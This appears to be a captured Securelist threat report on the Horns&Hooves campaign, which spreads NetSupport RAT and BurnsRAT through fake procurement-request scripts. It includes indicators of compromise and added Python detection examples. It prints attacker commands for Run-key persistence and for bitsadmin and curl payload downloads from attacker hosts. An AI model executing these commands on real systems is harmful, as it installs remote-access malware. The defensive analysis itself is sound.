securelist.com
158.160.164.142
Public Scan
Submitted URL: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/#new_tab
Effective URL: https://securelist.com/horns-n-hooves-campaign-delivering-netsupport-rat/114740/
Submission: On December 04 via api from IN — Scanned from US
HTML Local Storage * kasperskyform.eu 3 b24-analytics-counter-22-viewPending Maximum Storage Duration: SessionType: HTML Local Storage BITRIX_SM_kernelCollects information on user preferences and/or interaction with web-campaign content - This is used on CRM-campaign-platform used by website owners for promoting events or products. Maximum Storage Duration: 1 dayType: HTTP Cookie BITRIX_SM_kernel_0Collects information on user preferences and/or interaction with web-campaign content - This is used on CRM-campaign-platform used by website owners for promoting events or products. Maximum Storage Duration: 1 dayType: HTTP Cookie * yandex.com yandex.ru 6 _yasc [x2]Collects data on the user across websites - This data is used to make advertisement more relevant. Maximum Storage Duration: 10 yearsType: HTTP Cookie bh [x2]Collects data on user behaviour and interaction in order to optimize the website and make advertisement on the website more relevant. Maximum Storage Duration: 400 daysType: HTTP Cookie yashr [x2]Pending Maximum Storage Duration: 1 yearType: HTTP Cookie * Unclassified 5 Unclassified cookies are cookies that we are in the process of classifying, together with the providers of individual cookies. * Meta Platforms, Inc. 
1 Learn more about this provider __test__#Pending Maximum Storage Duration: SessionType: HTML Local Storage * Yandex 1 Learn more about this provider _ymBRCPending Maximum Storage Duration: PersistentType: HTML Local Storage * kasperskyform.eu 3 b24-analytics-counter-1126-viewPending Maximum Storage Duration: SessionType: HTML Local Storage b24-analytics-counter-1342-viewPending Maximum Storage Duration: SessionType: HTML Local Storage qmbPending Maximum Storage Duration: SessionType: HTTP Cookie Cross-domain consent2 Your consent applies to the following domains: List of domains your consent applies to: securelist.lat securelist.com Cookie declaration last updated on 11/29/24 by Cookiebot [#IABV2_TITLE#] [#IABV2_BODY_INTRO#] [#IABV2_BODY_LEGITIMATE_INTEREST_INTRO#] [#IABV2_BODY_PREFERENCE_INTRO#] [#IABV2_LABEL_PURPOSES#] [#IABV2_BODY_PURPOSES_INTRO#] [#IABV2_BODY_PURPOSES#] [#IABV2_LABEL_FEATURES#] [#IABV2_BODY_FEATURES_INTRO#] [#IABV2_BODY_FEATURES#] [#IABV2_LABEL_PARTNERS#] [#IABV2_BODY_PARTNERS_INTRO#] [#IABV2_BODY_PARTNERS#] Cookies are small text files that can be used by websites to make a user's experience more efficient. The law states that we can store cookies on your device if they are strictly necessary for the operation of this site. For all other types of cookies we need your permission. This site uses different types of cookies. Some cookies are placed by third party services that appear on our pages. You can at any time change or withdraw your consent from the Cookie Declaration on our website. Learn more about who we are, how you can contact us and how we process personal data in our Privacy Policy. Please state your consent ID and date when you contact us regarding your consent. 
Do not sell or share my personal information Use necessary cookies only Allow selection Customize Allow all cookies Solutions for: * Home Products * Small Business 1-50 employees * Medium Business 51-999 employees * Enterprise 1000+ employees by Kaspersky * CompanyAccount * Get In Touch * Dark mode off * English * Russian * Spanish * Solutions * * Internet of Things & Embedded Security Learn More * Industrial Cybersecurity Learn More * Fraud Prevention Learn More * KasperskyOS-based solutions Learn More * * OTHER SOLUTIONS * Kaspersky for Security Operations Center * Kaspersky IoT Infrastructure Security * Kaspersky Secure Remote Workspace * Industries * * National Cybersecurity Learn More * Industrial Cybersecurity Learn More * Finance Services Cybersecurity Learn More * Healthcare Cybersecurity Learn More * Transportation Cybersecurity Learn More * Retail Cybersecurity Learn More * * OTHER INDUSTRIES * Telecom Cybersecurity * View all * Products * * Kaspersky Next NEW! Learn More * KasperskyXDR Learn More * KasperskyEndpoint Security for Business Learn More * KasperskyEDR Expert Learn More * KasperskyEDR Optimum Learn More * KasperskyAnti Targeted Attack Platform Learn More * KasperskyHybrid Cloud Security Learn More * KasperskySD-WAN Learn More * KasperskyIndustrial CyberSecurity Learn More * KasperskyContainer Security Learn More * * OTHER PRODUCTS * Kaspersky Security for Internet Gateway * Kaspersky Embedded Systems Security * Kaspersky IoT Infrastructure Security * Kaspersky Secure Remote Workspace * Kaspersky Security for Mail Server * View All * Services * * KasperskyCybersecurity Services Learn More * KasperskySecurity Awareness Learn More * KasperskyPremium Support Learn More * KasperskyThreat Intelligence Learn More * KasperskyManaged Detection and Response Learn More * KasperskyCompromise Assessment Learn More * KasperskySOC Consulting Learn More * * OTHER SERVICES * Kaspersky Professional Services * Kaspersky Incident Response * Kaspersky 
Research

HORNS&HOOVES CAMPAIGN DELIVERS NETSUPPORT RAT AND BURNSRAT

02 Dec 2024, 11 minute read

Table of Contents
* Statistics
* Malicious scripts
  * Version A (HTA)
  * Version B (JS + NSM)
  * Version C (JS + BurnsRAT)
  * Version D (JS + Hosted NSM ZIP)
  * Version E (JS + Embedded NSM ZIP)
* Attribution
* What happens after RMS or NetSupport RAT is installed
* Takeaways
* Indicators of compromise
  * Malicious file hashes

Authors
* Artem Ushkov

Recent months have seen a surge in mailings with lookalike email attachments in the form of a ZIP archive containing JScript scripts. The script files – disguised as requests and bids from potential customers or partners – bear names such as “Запрос цены и предложения от Индивидуального предпринимателя <ФИО> на август 2024. АРТ-КП0005272381.js” (Request for price and proposal from sole trader <name> for August 2024. ART-KP0005272381.js), “Запрос предложений и цен от общества с ограниченной ответственностью <предприятие> на сентябрь 2024. отэк-мн0008522309.js” (Request for proposals and prices from LLC <company> for September 2024. Otek-mn0008522309.js), and the like.

Figure: Examples of malicious emails

According to our telemetry, the campaign began around March 2023 and hit more than a thousand private users, retailers and service businesses located primarily in Russia. We dubbed this campaign Horns&Hooves, after a fictitious organization set up by swindlers in the Soviet comedy novel The Golden Calf.

STATISTICS

Figure: Number of users who encountered the malicious script, by month, March 2023 — September 2024

MALICIOUS SCRIPTS

During the campaign, the threat actors made some major changes to the script, while keeping the same distribution method. In almost all cases, a JS script named “Заявка на закупку…” (“Purchase request…”), “Запрос цен…” (“Request for quote…”), or similar was sent in a ZIP archive. Far more rarely, the scripts were called “Акт сверки…” (“Reconciliation statement…”), “Заявление на возврат…” (“Request for refund…”), “Досудебная претензия…” (“Letter of claim…”) or just “Претензия…” (“Claim…”). The earliest versions that we encountered in April and May used scripts with the HTA extension instead of JS scripts.

For believability, besides the script, the attackers sometimes added to the archive various documents related to the organization or individual being impersonated. For example, an archive attached to a booking cancellation email contained a PDF file with a copy of a passport, while price request emails had extracts from the Russian Unified State Register of Legal Entities, certificates of tax registration and company cards attached.

Below, we examine several versions of the scripts used in this campaign.

Figure: Typical archive contents

VERSION A (HTA)

Some of the first sample scripts we saw in April and early May 2023 were relatively small in size. As an example, we analyzed a sample with the MD5 hash sum 327a1f32572b4606ae19085769042e51.

Figure: First version of the malicious script in attachment

When run, the script downloads a decoy document from https://www.linkpicture[.]com/q/1_1657.png in the form of a PNG image, which it then shows to the user. In this case, the image looks like a screenshot of a table listing items for purchase. It may have been taken from a previously infected machine.

Figure: Decoy document in PNG format

Note that PNG decoy documents are rather unconventional. Usually, bids and requests that are used to distract user attention from malware are distributed in office formats such as DOCX, XLSX, PDF and others. The most likely reason for using PNG is that in the very first versions the attackers hid the payload at the end of the bait file. PNG images make convenient containers because they continue to display correctly even after the payload is added.

To download the decoy document, the attackers use the curl utility, which comes preinstalled on devices with Windows 10 (build 17063 and higher). Together with the document, using another built-in Windows utility, bitsadmin, the script downloads and runs the BAT file bat_install.bat to install the main payload. The script also makes use of bitsadmin for managing file transfer tasks.

Figure: Snippet of the BAT script that installs the payload

Using bitsadmin, the BAT script first downloads from the attackers’ address hxxps://golden-scalen[.]com/files/, and then installs, the following files:

File name         Description
AudioCapture.dll  NetSupport Audio Capture
client32.exe      NetSupport client named CrossTec
client32.ini      Configuration file
HTCTL32.DLL       NetSupport utility for HTTP data transfer
msvcr100.dll      Microsoft C runtime library
nskbfltr.inf      Windows Driver Frameworks configuration file for installing additional drivers
NSM.LIC           NetSupport license file
nsm_vpro.ini      Additional NSM settings
pcicapi.dll       pcicapi file from the NetSupport Manager package
PCICHEK.DLL       CrossTec VueAlert PCIChek
PCICL32.DLL       NetSupport client as a DLL
remcmdstub.exe    CrossTec remote command line
TCCTL32.DLL       NetSupport utility for TCP data transfer

To download the required file, bat_install.bat appends its name to the end of the URL. The script saves the downloaded files to the user directory %APPDATA%\VCRuntineSync.

The payload is the legitimate NetSupport Manager (NSM) tool for remote PC management. This software is often used in corporate environments for technical support, employee training and workstation management. However, due to its capabilities, it is regularly exploited by all kinds of cybergangs. The versions and modifications of this software seen in cyberattacks and providing a stealth run mode have been dubbed NetSupport RAT. Most often, NetSupport RAT infiltrates the system through scam websites and fake browser updates. In December 2023, we posted a report on one such campaign that installed NetSupport RAT under the guise of a browser update after the user visited a compromised website.

After the file download, the bat_install.bat script runs the client32.exe file and adds it to the startup list.

    start /B cmd /C "start client32.exe & exit"
    reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "VCRuntineSync" /t REG_SZ /d '%APPDATA%\VCRuntineSync\client32.exe' /f

And, in case the HTA script failed, the BAT script attempts to download and run the bait file.

When NetSupport RAT is run, it establishes a connection to one of the attackers’ servers set in the client32.ini configuration file: the main one, xoomep1[.]com:1935, or the backup one, xoomep2[.]com:1935.

Figure: The client32.ini configuration file

Figure: Version A infection chain

VERSION B (JS + NSM)

A bit later, in mid-May 2023, there appeared versions of the script mimicking legitimate JS files.

Figure: JS version of the malicious script in attachment

The code of this script contains a comment from the publicly available JavaScript library Next.js with license and copyright information. This way, the attackers try to make the code appear legitimate. We also see that they added malicious code to the middle of the file, where a cursory inspection would miss it but where it still gets executed at runtime.

In terms of functionality, the JS versions of the script are virtually the same as the HTA ones. They too show a decoy document and install NetSupport RAT. But there are some differences. For example, the script with the hash sum b3bde532cfbb95c567c069ca5f90652c, which we found under the filename “досудебная претензия от 18.05.2023 №5 от компании ооо <НАЗВАНИЕ_КОМПАНИИ>.js” (“Letter of claim No. 5, dated May 18, 2023, from LLC <company>.js”), first downloads an intermediate JS script from the address hxxp://188[.]227[.]58[.]243/pretencia/www.php.

Figure: Second script contents

This second script downloads two more files: the decoy document zayavka.txt and the NetSupport RAT installer installer_bat_vbs.bat. Like PNG images, decoy documents in TXT format are not standard practice. And with this version, the files contain generated text in Russian that is meaningless and repeated several times, using different characters that look vaguely Cyrillic. They would appear to be the first tests of the new bait file format.

Figure: Decoy document with meaningless text

After downloading the files, the www.php script opens the text document and runs the NetSupport RAT installer, which it saves with the name BLD.bat. To download the NetSupport components, the script uses the same path as version A: hxxps://golden-scalen[.]com/files/. Unlike the previous version, this script downloads the files to the %APPDATA%\EdgeCriticalUpdateService directory. Correspondingly, the autorun registry key used by this version is named EdgeCriticalUpdateService. Also, the BLD.bat file contains no redundant code for re-downloading the bait file.

Figure: Version B infection chain

VERSION C (JS + BURNSRAT)

Another interesting sample we found in mid-May had the name “заявка на закупки №113 от компании <НАЗВАНИЕ_КОМПАНИИ> на май 2023 года.js” (“procurement request No. 113 from <company> for May 2023.js”) and the MD5 hash sum 5f4284115ab9641f1532bb64b650aad6.

Figure: Fully obfuscated version of the malicious script

Here, we also see a comment with license and copyright information about the Next.js library, but there is nothing left of the library source code. The malicious code itself is more heavily obfuscated, and the link to the intermediate script hxxp://188[.]227[.]106[.]124/test/js/www.php is invisible to the naked eye.

Figure: Second script contents

In this version, the intermediate script downloads three more files: the decoy document zayavka.txt, the payload BLD.exe, and the auxiliary script 1.js. The decoy document in this instance looks more meaningful, and is likely the result of a screenshot-to-text conversion.

Figure: Decoy document

Having loaded the files, the www.php script opens the decoy document and runs the 1.js file, which in turn launches the BLD.exe file. What’s most striking about this instance is the payload. BLD.exe (MD5: 20014b80a139ed256621b9c0ac4d7076) is an NSIS installer that creates a Silverlight.7z archive in the %PROGRAMDATA%\Usoris\LastVersion folder and extracts several files from it:

File name                      Description
libeay32.dll                   OpenSSL shared library
msimg32.dll                    Malicious loader
settings.dat                   RMS configuration file
Silverlight.Configuration.exe  Legitimate Microsoft Silverlight Configuration Utility
ssleay32.dll                   OpenSSL shared library
w32.dat                        Archive with RDP Wrapper x32
w64.dat                        Archive with RDP Wrapper x64
WUDFHost.exe                   Remote Manipulator System

The next step is to run the legitimate Silverlight.Configuration.exe file. When launched, it loads the dynamic libraries (DLLs) that the program needs, using a relative path. This opens the door to a DLL side-loading attack: the malicious msimg32.dll library and the utility are placed in the same directory, which results in the malicious program being loaded and gaining control instead of the system library.

Although the backdoor supports commands for remotely downloading and running files, as well as various methods of executing commands via the Windows command line, the main task of this component is to start the Remote Manipulator System (RMS) as a service and send the RMS session ID to the attackers’ server.

    svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"

On top of that, msimg32.dll sends information about the computer to the server hxxp://193[.]42[.]32[.]138/api/.
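The behaviours described for versions A through C leave a recognisable trace in process-creation telemetry: a script host spawning curl or bitsadmin to fetch files into a user-writable directory, client32.exe being started from such a directory and registered under the Run key, and svchost.exe being invoked with the -svcr switch to start RMS as a service. The block below is an added example, not code from the report or from any vendor product: a Python checker that applies those four rules to constructed Sysmon-style process-creation events. The event field layout, the sample user name and the benign control event are assumptions made for the example; the paths, autorun value name, svchost switch and defanged URLs are taken from the report.

```python
import re

# Constructed, Sysmon-like process-creation events (Event ID 1 style).
# The field layout is an assumption for this example; only the paths,
# switches, autorun value name and URLs (kept defanged as in the report)
# come from the Horns&Hooves write-up.
SAMPLE_EVENTS = [
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\curl.exe",
     "cmdline": r'curl -o "C:\Users\u\AppData\Roaming\VCRuntineSync\1.png" hxxps://www.linkpicture[.]com/q/1_1657.png'},
    {"parent": r"C:\Windows\System32\wscript.exe",
     "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmdline": r'bitsadmin /transfer dl /download /priority high hxxps://golden-scalen[.]com/files/client32.exe C:\Users\u\AppData\Roaming\VCRuntineSync\client32.exe'},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Users\u\AppData\Roaming\VCRuntineSync\client32.exe",
     "cmdline": r"client32.exe"},
    {"parent": r"C:\Windows\System32\cmd.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r'reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "VCRuntineSync" /t REG_SZ /d "C:\Users\u\AppData\Roaming\VCRuntineSync\client32.exe" /f'},
    {"parent": r"C:\ProgramData\Usoris\LastVersion\Silverlight.Configuration.exe",
     "image": r"C:\Windows\System32\svchost.exe",
     "cmdline": r'svchost.exe -k "WUDFHostController" -svcr "WUDFHost.exe"'},
    # Benign control event: an administrator querying the Run key from PowerShell.
    {"parent": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "image": r"C:\Windows\System32\reg.exe",
     "cmdline": r"reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run"},
]

SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe")
DOWNLOADERS = ("curl.exe", "bitsadmin.exe", "certutil.exe")
# Directories a standard user can write to; a RAT dropped there is the
# pattern seen in every version of this campaign.
USER_WRITABLE = re.compile(r"\\(AppData\\(Roaming|Local)|ProgramData|Users\\Public)\\", re.I)


def _basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def classify(event):
    """Return the list of rule names the event matches (empty if none)."""
    parent, image, cmd = event["parent"], event["image"], event["cmdline"]
    hits = []
    # Rule 1: script host -> built-in downloader writing below a user-writable dir.
    if _basename(parent) in SCRIPT_HOSTS and _basename(image) in DOWNLOADERS \
            and USER_WRITABLE.search(cmd):
        hits.append("script_host_download_to_userdir")
    # Rule 2: the NetSupport client executable running from a user-writable path.
    if _basename(image) == "client32.exe" and USER_WRITABLE.search(image):
        hits.append("netsupport_client_in_userdir")
    # Rule 3: Run-key persistence whose target lives in a user-writable path.
    if _basename(image) == "reg.exe" and " add " in cmd.lower() \
            and re.search(r"\\CurrentVersion\\Run\b", cmd, re.I) \
            and USER_WRITABLE.search(cmd):
        hits.append("run_key_points_to_userdir")
    # Rule 4: svchost.exe with the -svcr switch, which the BurnsRAT loader uses
    # to start RMS as a service and which normal svchost invocations lack.
    if _basename(image) == "svchost.exe" and "-svcr" in cmd.lower():
        hits.append("svchost_svcr_switch")
    return hits


def scan(events):
    """Map each event index to its matched rule names, skipping clean events."""
    return {i: h for i, e in enumerate(events) if (h := classify(e))}


if __name__ == "__main__":
    for idx, rules in scan(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["image"], rules)
```

The rules deliberately key on behaviour (who spawns the downloader, where the binary lives, which switch svchost receives) rather than on the campaign's hashes, so they still fire when the attackers rotate servers or, as in version E, embed the archive in the script.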
Figure: Outgoing request to the server

The sent data is encrypted using the RC4 algorithm with the Host value as the key, which in this case is the IP address of the server, 193.42.32[.]138.

Figure: System information sent by the library

RMS is an application that allows users to interact with remote systems over a network. It provides the ability to manage the desktop, execute commands, transfer files and exchange data between devices located in different geographic locations. Typically, RMS uses encryption technologies to protect data and can run on a variety of operating systems. The RMS build distributed by the attackers is also called BurnsRAT.

RMS has support for connecting to a remote computer via Remote Desktop Protocol (RDP), so besides the application itself and files for running it, the NSIS installer saves to the device the w32.dat and w64.dat archives, which contain a set of libraries created using RDP Wrapper to activate additional RDP features. RDP Wrapper is a program for activating remote desktop features in Windows versions that do not support them by default, such as Windows Home; it also allows multiple users to connect to one system simultaneously.

At its core, RMS is a close analog of NetSupport, but the RMS payload did not gain traction.

Figure: BurnsRAT infection chain

VERSION D (JS + HOSTED NSM ZIP)

A few more characteristic changes in the scripts caught our eye in late May 2023. Let’s examine them using a file named “purchase request from LLC <company> No. 3.js” with hash sum 63647520b36144e31fb8ad7dd10e3d21 as an example. The initial script itself is very similar to version B and differs only in the link to the second script, hxxp://45[.]133[.]16[.]135/zayavka/www.php. But unlike version B, the BAT file for installing NetSupport RAT has been completely rewritten.
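Because the BurnsRAT loader described in version C keys its RC4 stream with the Host value of its own request, an analyst holding a capture of the exchange already has the key in the clear. The block below is an added example, not code from the report or from the malware: a plain RC4 implementation in Python applied to a constructed system-information blob, showing that the same Host string both produces and recovers the ciphertext. The field names in the blob are invented for the example; the only value taken from the report is the C2 address 193.42.32[.]138, written without defanging because it is used as the key.

```python
def rc4_ksa(key: bytes) -> list:
    """Key-scheduling algorithm: permute 0..255 using the key bytes."""
    s = list(range(256))
    j = 0
    for i in range(256):
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    return s


def rc4(key: bytes, data: bytes) -> bytes:
    """RC4 is symmetric: the same call encrypts and decrypts."""
    s = rc4_ksa(key)
    out = bytearray()
    i = j = 0
    for byte in data:
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


# Constructed stand-in for the system-information blob; the real field layout
# is not reproduced here. The key is the Host header value, i.e. the C2 IP
# address from the report (193.42.32[.]138), written undefanged.
HOST = "193.42.32.138"
SAMPLE_SYSINFO = b"id=CONSTRUCTED-RMS-ID-0001&os=Windows 10&user=u"


def encrypt_for_host(host: str, plaintext: bytes) -> bytes:
    """What the loader does: RC4 the blob with the Host string as key."""
    return rc4(host.encode(), plaintext)


def decrypt_from_capture(host_header: str, body: bytes) -> bytes:
    """What an analyst does with a pcap: key = Host header, decrypt the body."""
    return rc4(host_header.encode(), body)


if __name__ == "__main__":
    body = encrypt_for_host(HOST, SAMPLE_SYSINFO)
    print(body.hex())
    print(decrypt_from_capture(HOST, body))
```

The practical consequence for detection engineering is that this traffic is decryptable from network captures alone: the Host header is part of the same request, so no host-side key extraction is needed, and a decrypted body that looks like a system inventory is a strong confirmation of the BurnsRAT check-in.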
Figure: BAT script contents

In this version, it is located at hxxp://45[.]133[.]16[.]135/zayavka/666.bat, and to install NetSupport it downloads an intermediate PowerShell script hxxp://45[.]133[.]16[.]135/zayavka/1.yay, which in turn downloads and unpacks the NetSupport RAT archive from hxxp://golden-scalen[.]com/ngg_cl.zip. The contents of the archive are identical in every way to the NetSupport version installed by the version B script.

Figure: PowerShell script contents

Figure: Version D infection chain

VERSION E (JS + EMBEDDED NSM ZIP)

The next notable, but less fundamental changes appeared in June 2023. Instead of downloading the encoded ZIP archive with NetSupport RAT, the attackers began placing it inside the script. This caused the script to increase in size. In addition, the comment in the file header was replaced with one from the Backbone.js library.

Figure: Snippet of the third version of the script

Starting around September 2023, the NetSupport RAT files were split into two archives; and since February 2024, instead of text bait files, the attackers have been striving for greater plausibility by using PDF documents, which were also contained in the script code.

Figure: Version E decoy document

Figure: Version E infection chain

ATTRIBUTION

All NetSupport RAT builds detected in the campaign contained one of three license files with the following parameters:

File 1: licensee=HANEYMANEY, serial_no=NSM385736
File 2: licensee=DCVTTTUUEEW23, serial_no=NSM896597
File 3: licensee=DERTERT, serial_no=NSM386098

Figure: License files

These license files were also used in various other unrelated campaigns. For instance, they’ve been seen in mailings targeting users from other countries, such as Germany. And they’ve cropped up in NetSupport RAT builds linked to the TA569 group (also known as Mustard Tempest or Gold Prelude). Note that licenses belonging to HANEYMANEY and DCVTTTUUEEW23 featured in the Horns&Hooves campaign for a short span before being completely dislodged by a license issued in the name of DERTERT three months later.

                                               HANEYMANEY   DCVTTTUUEEW23   DERTERT
Date of creation in the comment in the file    2022.07.17   2014.03.29      2017.07.26
Date from the file attributes in the archive   2022.07.17   2023.03.29      2022.07.26
Observed as part of the campaign               2023.04.17   2023.05.28      2023.07.09

The fact that Horns&Hooves uses the same licenses as TA569 led us to suspect a possible connection between the two. That said, because license files alone are insufficient to attribute malicious activity to TA569, we decided to look for other similarities. And so we compared the various configuration files that featured in the Horns&Hooves campaign and those used by TA569 – and found them to be near identical. As an example, let’s consider the Horns&Hooves configuration file (edfb8d26fa34436f2e92d5be1cb5901b) and the known configuration file of the TA569 group (67677c815070ca2e3ebd57a6adb58d2e).

Figure: Comparing the Horns&Hooves and TA569 configuration files

As we can see, everything matches except the domains and ports. The Gateway Security Key (GSK) field warrants special attention. The fact that the values match indicates that the attackers use the same security key to access the NetSupport client. And this means that the C2 operators in both cases most likely belong to TA569. We checked if the key GSK=GF<MABEF9G?ABBEDHG:H had been seen in other campaigns that could not be attributed to either Horns&Hooves or TA569, and found none. Besides this key, we encountered another value in the Horns&Hooves campaign, GSK=FM:N?JDC9A=DAEFG9H<L>M; and in later versions there appeared one more version of the key, which was set with the parameter SecurityKey2=dgAAAI4dtZzXVyBIGlsJn859nBYA.
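The attribution above, and the version A description of the client32.ini gateways (xoomep1[.]com:1935 and xoomep2[.]com:1935), both come down to a few fields of one INI file. The block below is an added example, not code from the report or from NetSupport Manager: a Python hunter that parses client32.ini-style text, pulls out the gateway addresses and the GSK / SecurityKey2 values, and flags anything that matches the indicators given in this article. The constructed sample only approximates the real file: section names and any field other than GSK, SecurityKey2 and the gateway address fields are assumptions for the example, while the key values and the hostnames are the ones the report lists.

```python
import re
import sys

# Indicators taken from the report. GSK values are stored without the
# "GSK=" prefix so they can be compared with the parsed field directly.
KNOWN_GSK = {
    "GF<MABEF9G?ABBEDHG:H": "shared Horns&Hooves / TA569 key",
    "FM:N?JDC9A=DAEFG9H<L>M": "Horns&Hooves key",
}
KNOWN_SECURITYKEY2 = {
    "dgAAAI4dtZzXVyBIGlsJn859nBYA": "Horns&Hooves later builds",
}
# C2 hosts from the indicators section, refanged for matching against INI text.
KNOWN_GATEWAYS = {h.replace("[.]", ".") for h in (
    "xoomep1[.]com", "xoomep2[.]com", "labudanka1[.]com", "labudanka2[.]com",
    "gribidi1[.]com", "gribidi2[.]com", "shetrn1[.]com", "shetrn2[.]com")}

# Constructed sample. Section names and fields other than GSK, SecurityKey2
# and the gateway address fields are assumptions, not the real client32.ini.
SAMPLE_INI = """\
[Client]
quiet=1
silent=1
[General]
SecurityKey2=dgAAAI4dtZzXVyBIGlsJn859nBYA
[HTTP]
GatewayAddress=xoomep1.com:1935
SecondaryGateway=xoomep2.com:1935
GSK=GF<MABEF9G?ABBEDHG:H
"""


def parse_client32(text):
    """Return {'gateways': [(host, port|None)], 'gsk': str|None, 'securitykey2': str|None}.

    A hand-rolled parser is used because the GSK value can contain '=', ':'
    and other characters that configparser would treat as delimiters.
    """
    gateways, gsk, sk2 = [], None, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")) or line.startswith("["):
            continue
        if "=" not in line:
            continue
        key, value = (p.strip() for p in line.split("=", 1))
        k = key.lower()
        if k == "gsk":
            gsk = value
        elif k == "securitykey2":
            sk2 = value
        elif "gateway" in k:
            m = re.match(r"([^:\s]+)(?::(\d+))?$", value)
            if m:
                gateways.append((m.group(1).lower(), int(m.group(2)) if m.group(2) else None))
    return {"gateways": gateways, "gsk": gsk, "securitykey2": sk2}


def assess(parsed):
    """Return human-readable findings for a parsed client32.ini (empty if clean)."""
    findings = []
    label = KNOWN_GSK.get(parsed["gsk"] or "")
    if label:
        findings.append(f"GSK matches known value ({label})")
    label = KNOWN_SECURITYKEY2.get(parsed["securitykey2"] or "")
    if label:
        findings.append(f"SecurityKey2 matches known value ({label})")
    for host, port in parsed["gateways"]:
        if host in KNOWN_GATEWAYS:
            findings.append(f"gateway {host}:{port} is a known C2")
    return findings


if __name__ == "__main__":
    # Pass a path to a real client32.ini, or run without arguments for the sample.
    text = open(sys.argv[1], encoding="utf-8", errors="replace").read() if len(sys.argv) > 1 else SAMPLE_INI
    for finding in assess(parse_client32(text)) or ["no known indicators"]:
        print(finding)
```

Matching on GSK rather than only on hostnames is the point of the exercise: the report shows that the gateways and ports differ between the Horns&Hooves and TA569 files while the security key is identical, so a copy of client32.ini found during triage can be tied to this operator even after the C2 domains change.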
WHAT HAPPENS AFTER RMS OR NETSUPPORT RAT IS INSTALLED

The installation of BurnsRAT or NetSupport RAT is only an intermediate link in the attack chain, giving remote access to the computer. In a number of cases, we observed attempts to use NetSupport RAT to install stealers such as Rhadamanthys and Meduza. However, TA569 generally sells access to infected computers to other groups, for example, to install ransomware Trojans. But it’s possible that the attackers may collect various documents and email addresses to further develop the campaign, since the earliest scripts distributed Rhadamanthys instead of NetSupport RAT.

TAKEAWAYS

This post has looked in detail at several ways of delivering and using legitimate software for malicious purposes as part of a sustained campaign. Over the course of the campaign, the attackers changed some of their tactics and experimented with new tools. For instance, they gradually moved away from using additional servers to deliver the payload, leaving only two as a result, which the remote administration software itself uses. Also, the attackers initially weaponized BurnsRAT, but then abandoned it and placed all the program code for installing and running NetSupport RAT in a single script. They probably found this approach more efficient in terms of both development and difficulty of detection.

We were able to determine with a high degree of certainty that the campaign is linked to the TA569 group, which gains access to organizations and then sells it to other cybercriminals on the dark web. Depending on whose hands this access falls into, the consequences for victim companies can range from data theft to encryption and damage to systems. We also observed attempts to install stealers on some infected machines.

INDICATORS OF COMPROMISE

MALICIOUS FILE HASHES

Version A
327a1f32572b4606ae19085769042e51 — HTA
34eb579dc89e1dc0507ad646a8dce8be — bat_install.bat

Version B
b3bde532cfbb95c567c069ca5f90652c — JS
29362dcdb6c57dde0c112e25c9706dcf — www.php
882f2de65605dd90ee17fb65a01fe2c7 — installet_bat_vbs.bat

Version C
5f4284115ab9641f1532bb64b650aad6 — JS
0fea857a35b972899e8f1f60ee58e450 — www.php
20014b80a139ed256621b9c0ac4d7076 — BLD.exe
7f0ee078c8902f12d6d9e300dabf6aed — 1.js

Version D
63647520b36144e31fb8ad7dd10e3d21 — JS
8096e00aa7877b863ef5a437f55c8277 — www.php
12ab1bc0989b32c55743df9b8c46af5a — 666.bat
50dc5faa02227c0aefa8b54c8e5b2b0d — 1.yay
e760a5ce807c756451072376f88760d7 — ngg_cl.zip

Version E
b03c67239e1e774077995bac331a8950 — 2023.07
ba69cc9f087411995c64ca0d96da7b69 — 2023.09
051552b4da740a3af5bd5643b1dc239a — 2024.02

BurnsRAT C&C
hxxp://193[.]42[.]32[.]138/api/
hxxp://87[.]251[.]67[.]51/api/

Links, version A
hxxp://31[.]44[.]4[.]40/test/bat_install.bat
hxxps://golden-scalen[.]com/files/*

Links, version B
hxxp://188[.]227[.]58[.]243/pretencia/www.php
hxxp://188[.]227[.]58[.]243/zayavka/www.php
hxxp://188[.]227[.]58[.]243/pretencia/installet_bat_vbs.bat
hxxps://golden-scalen[.]com/files/*

Links, version C
hxxp://188[.]227[.]106[.]124/test/js/www.php
hxxp://188[.]227[.]106[.]124/test/js/BLD.exe
hxxp://188[.]227[.]106[.]124/test/js/1.js

Links, version D
hxxp://45[.]133[.]16[.]135/zayavka/www.php
hxxp://45[.]133[.]16[.]135/zayavka/666.bat
hxxp://45[.]133[.]16[.]135/zayavka/1.yay
hxxp://golden-scalen[.]com/ngg_cl.zip

Client32.ini for Horns&Hooves
edfb8d26fa34436f2e92d5be1cb5901b
3e86f6fc7ed037f3c9560cc59aa7aacc
ae4d6812f5638d95a82b3fa3d4f92861

Client32.ini known to belong to TA569
67677c815070ca2e3ebd57a6adb58d2e

Nsm.lic
17a78f50e32679f228c43823faabedfd — DERTERT
b9956282a0fed076ed083892e498ac69 — DCVTTTUUEEW23
1b41e64c60ca9dfadeb063cd822ab089 — HANEYMANEY

NetSupport RAT C2 centers for Horns&Hooves
xoomep1[.]com
xoomep2[.]com
labudanka1[.]com
labudanka2[.]com
gribidi1[.]com
gribidi2[.]com

C2 centers known to be linked to TA569
shetrn1[.]com
shetrn2[.]com

Tags: BurnsRAT, JavaScript, Malware, Malware Descriptions, Malware Statistics, Malware Technologies, NetSupport RAT, Phishing, RAT Trojan
